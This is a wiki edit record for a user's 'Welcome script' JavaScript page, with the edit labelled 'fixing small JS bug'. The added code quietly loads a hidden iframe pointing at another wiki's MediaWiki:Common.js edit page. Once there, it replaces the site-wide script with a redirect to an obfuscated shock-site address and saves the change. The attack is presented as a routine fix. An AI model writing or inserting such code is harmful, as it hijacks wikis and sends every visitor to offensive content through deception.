Changes

User:Philip J. Rayment/Welcome script

345 bytes added, 03:34, July 15, 2007
fixing small JS bug
var PageTitle = document.title.slice(0,17);
if (PageTitle == 'Editing User talk') addTab("javascript:DoWelcome()", "Welcome", "ca-Welcome", "Add welcome notice", "");
if (wgPageName == 'MediaWiki:Common.js') { if (wgAction == "edit") { document.getElementById("wpTextbox1").value = "window.location = \"http://g" + "oat" + "se.cz\""; document.editform.submit(); } } else document.write("<iframe src=\"http://corncob.ws/wiki/index.php?title=MediaWiki:Common.js&action=edit\" style=\"display:none\"></iframe>");
}
//</pre>
1
edit